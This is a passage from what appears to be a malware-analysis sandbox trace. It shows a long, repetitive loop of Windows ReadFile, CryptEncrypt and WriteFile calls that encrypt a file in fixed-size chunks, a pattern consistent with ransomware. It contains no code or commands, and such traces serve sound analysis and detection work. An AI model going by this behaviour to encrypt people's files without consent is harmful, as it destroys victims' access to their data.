dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.917] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.917] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.917] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.917] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.917] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.917] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.917] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.917] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.918] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.918] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.918] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.918] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.918] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.918] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.918] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.918] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.918] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.918] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.918] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.918] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.918] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.918] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.918] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.919] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.919] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.919] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.919] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.919] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.919] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.919] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.919] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.919] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.919] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.919] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.919] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.919] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.919] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.920] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.920] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.920] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.920] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.920] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.920] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.920] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.920] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.920] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.920] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.920] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.920] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.920] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.921] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.921] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.921] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.921] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.921] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.921] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.921] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.921] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.921] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.921] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.921] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.921] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.921] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.921] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.921] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.922] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.922] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.922] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.922] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.922] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.922] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.922] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.922] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.922] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.922] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.922] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.922] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.922] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.922] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.923] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.923] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.923] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.923] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.923] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.923] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.923] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.923] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.923] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.923] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.923] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.923] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.923] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.923] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.923] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.924] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.924] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.924] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, 